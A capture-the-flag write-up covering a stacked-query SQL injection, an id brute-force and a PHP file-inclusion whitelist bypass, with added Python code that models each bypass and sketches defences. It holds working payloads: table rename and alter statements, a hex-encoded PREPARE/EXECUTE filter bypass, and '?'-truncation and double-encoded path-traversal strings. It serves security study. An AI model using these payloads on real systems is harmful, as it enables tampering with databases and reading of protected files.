Dump the columns:
payload: 1';show columns from words;#
payload: 1';show columns from 1919810931114514;#
The challenge environment seems to have a problem here: the columns of the second table cannot be dumped this way.
Rename the words table to some other name with RENAME TABLE.
Rename the 1919810931114514 table to words.
Add a new column called id to the new words table.
Rename the flag column to data.
1'; rename table words to word1; rename table `1919810931114514` to words; alter table words add id int unsigned not Null auto_increment primary key ; alter table words change flag data varchar(100); #
Enter 1 to get the flag
The second solution
Because select is filtered, the statement can be hex-encoded instead.
1';SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
PREPARE ... FROM ... creates a prepared statement; the hex literal is converted back into SQL text when it is prepared.
EXECUTE runs the statement created by PREPARE.
SELECT can assign values to multiple variables at the same time in one statement, while SET can only assign values to one variable at a time.
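To make both the DDL trick (rename/alter) and the hex-encoded PREPARE trick above concrete from the defender's side, here is an added Python example (not from the original writeup). It rebuilds the hex literal from the second payload, shows that a keyword-only filter (a constructed `\bselect\b` regex; the page says only that select is filtered, so the exact filter is an assumption) does not see the smuggled SELECT, and then triages the injected value the way a WAF rule or log reviewer should: by splitting stacked statements, flagging statement verbs that have no business inside a user value, and decoding any 0x literal before matching keywords against it.

```python
import re

# Hex literal copied from the writeup's second payload.
PAGE_HEX_LITERAL = "0x73656c656374202a2066726f6d20603139313938313039333131313435313460"

# Constructed: the writeup only says "select" is filtered; a case-insensitive
# keyword regex is an assumption about the shape of that filter.
BLACKLIST = re.compile(r"\bselect\b", re.IGNORECASE)

HEX_LITERAL_RE = re.compile(r"0x[0-9a-fA-F]+")
# Statement verbs that should never arrive inside a user-supplied value.
DANGEROUS_VERBS = {"rename", "alter", "prepare", "execute", "set"}


def encode_hex_literal(sql: str) -> str:
    """Turn SQL text into the bare 0x... literal form used in the writeup."""
    return "0x" + sql.encode("utf-8").hex()


def decode_hex_literal(literal: str) -> str:
    """Inverse of encode_hex_literal(); MySQL treats 0x... as a binary string."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a hex literal")
    return bytes.fromhex(literal[2:]).decode("utf-8")


def build_prepare_payload(sql: str, stmt: str = "execsql") -> str:
    """Stacked queries: SET a user variable to the hex literal, PREPARE from it, EXECUTE it."""
    return f"1';SET @a={encode_hex_literal(sql)};PREPARE {stmt} FROM @a;EXECUTE {stmt};#"


def naive_filter_blocks(inject: str) -> bool:
    """The keyword check the writeup bypasses: it only looks at the literal text."""
    return BLACKLIST.search(inject) is not None


def split_stacked(inject: str) -> list:
    """Split the injected value on ';' (quote-unaware, good enough for triage)."""
    return [s.strip() for s in inject.split(";") if s.strip()]


def leading_verb(stmt: str):
    """First word of a statement, lower-cased ('SeT@a=...' -> 'set'); None if it has none."""
    m = re.match(r"\s*([A-Za-z]+)", stmt)
    return m.group(1).lower() if m else None


def review_findings(inject: str) -> list:
    """Defender-side triage that looks *through* hex literals and at stacked verbs.

    Returns a list of reason strings; an empty list means nothing suspicious.
    """
    findings = []
    for stmt in split_stacked(inject):
        verb = leading_verb(stmt)
        if verb in DANGEROUS_VERBS:
            findings.append(f"stacked statement: {verb}")
        if BLACKLIST.search(stmt):
            findings.append(f"filtered keyword in clear text: {stmt!r}")
        for m in HEX_LITERAL_RE.finditer(stmt):
            try:
                decoded = decode_hex_literal(m.group(0))
            except (ValueError, UnicodeDecodeError):
                continue  # odd length or not text: not SQL smuggled as hex
            if BLACKLIST.search(decoded):
                findings.append(f"hex literal decodes to filtered SQL: {decoded!r}")
    return findings


if __name__ == "__main__":
    payload = build_prepare_payload(decode_hex_literal(PAGE_HEX_LITERAL))
    print(payload)
    print("naive filter blocks it:", naive_filter_blocks(payload))
    for finding in review_findings(payload):
        print(" -", finding)
```

The lesson the triage function encodes is that a keyword blacklist is not a boundary: the only robust fix for this class of challenge is parameterised queries and a connector that does not allow stacked statements, with keyword matching kept at most as a detection signal that decodes literals before it looks at them.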
The third solution: rewriting the upgraded version of the challenge
ics-06
The cloud platform's report center collected data for the basic equipment management service, but the data was deleted, leaving only a single trace of the intruder.
There is an id parameter in the URL to visit.
Brute-force the id directly with Burp Suite.
The range I set was 1-10000, but 1-3000 is enough.
warmup
My first real web challenge.
It was after doing this challenge that I really started learning web security.
I hate myself for not knowing about it earlier.
Press F12 to view the page source, then visit source.php.
Code audit: here is the code.
<?php
highlight_file(__FILE__);

class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source" => "source.php", "hint" => "hint.php"];

        // 1. page must be set and must be a string
        if (!isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        // 2. exact match against the whitelist values
        if (in_array($page, $whitelist)) {
            return true;
        }

        // 3. truncate at the first '?' and check again
        $_page = mb_substr($page, 0, mb_strpos($page . '?', "?"));
        if (in_array($_page, $whitelist)) {
            return true;
        }

        // 4. url-decode, truncate at the first '?' and check once more
        $_page = urldecode($page);
        $_page = mb_substr($_page, 0, mb_strpos($_page . '?', "?"));
        if (in_array($_page, $whitelist)) {
            return true;
        }

        echo "you can't see it";
        return false;
    }
}

// note: the checks above run on a derived value, but the raw request value is what gets included
if (!empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file'])) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
Let's go through it.
First it checks whether file is empty and whether it is a string, and then calls checkFile() on it.
If that succeeds, the file named by the file parameter is included.
Auditing checkFile()
First there is a whitelist. Inside checkFile, file is called page.
page must be non-empty, a string, and in the whitelist.
Next, page is truncated from its first character up to the position where the first ? appears.
So we can give the payload:
?file=hint.php?../../../../../ffffllllaaaagggg
This is the unintended solution.
If you don't go the unintended route:
A URL decode is performed in the PHP file, and the backend server also performs a URL decode.
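To show exactly why both the `?`-truncation payload and the double-URL-encoded route pass checkFile(), here is an added Python model of the PHP above (my own example, not part of the original writeup or the challenge). `php_request_value()` stands in for the one URL decode PHP applies when it fills `$_REQUEST`, which is the "backend server" decode the text refers to; the traversal target string is the one from the writeup. The hardened variant beside it fixes the actual bug: the original validates a derived value (truncated, decoded) but includes the raw one, so the fix is to accept only an exact whitelist key or file name and include the mapped file, never the request string.

```python
from urllib.parse import unquote

# Whitelist copied from the challenge's source.php.
WHITELIST = {"source": "source.php", "hint": "hint.php"}


def _cut_at_first_qmark(page: str) -> str:
    """mb_substr($page, 0, mb_strpos($page . '?', '?')): keep everything before the first '?'."""
    return page[: (page + "?").index("?")]


def check_file_original(page) -> bool:
    """Faithful model of emmm::checkFile(): three chances to match a whitelisted file name."""
    if not isinstance(page, str) or page == "":
        return False
    if page in WHITELIST.values():                        # 1. exact match
        return True
    if _cut_at_first_qmark(page) in WHITELIST.values():   # 2. truncated at the first '?'
        return True
    decoded = unquote(page)                               # 3. urldecode(), then truncate again
    if _cut_at_first_qmark(decoded) in WHITELIST.values():
        return True
    return False


def php_request_value(raw_query_value: str) -> str:
    """PHP decodes the query string once before filling $_REQUEST (so %253f becomes %3f)."""
    return unquote(raw_query_value)


def included_path_original(raw_query_value: str):
    """What the original code passes to include: the RAW request value, not the value it checked."""
    page = php_request_value(raw_query_value)
    return page if check_file_original(page) else None


def included_path_hardened(raw_query_value: str):
    """Fixed check: accept only a whitelist key or an exact file name, and include the mapped file."""
    page = php_request_value(raw_query_value)
    if page in WHITELIST:            # e.g. file=hint
        return WHITELIST[page]
    if page in WHITELIST.values():   # e.g. file=hint.php
        return page
    return None                      # anything else: no include at all


if __name__ == "__main__":
    # Constructed inputs: the writeup's payload, its double-encoded form, and a plain traversal.
    for raw in ("hint.php",
                "hint.php?../../../../../ffffllllaaaagggg",
                "hint.php%253f../../../../../ffffllllaaaagggg",
                "../../../../../ffffllllaaaagggg"):
        print(f"{raw!r:50} original -> {included_path_original(raw)!r:50} "
              f"hardened -> {included_path_hardened(raw)!r}")
```

Running it shows the original happily returning `hint.php?../../../../../ffffllllaaaagggg` and `hint.php%3f../../../../../ffffllllaaaagggg` as the include target (the second is what PHP sees after one decode of `%253f`, and the code's own urldecode() turns it into a `?` so the truncation matches), while the hardened version returns None for both; the general rule is to validate the same value you use, and to map user input to a fixed file name rather than letting it reach include() at all.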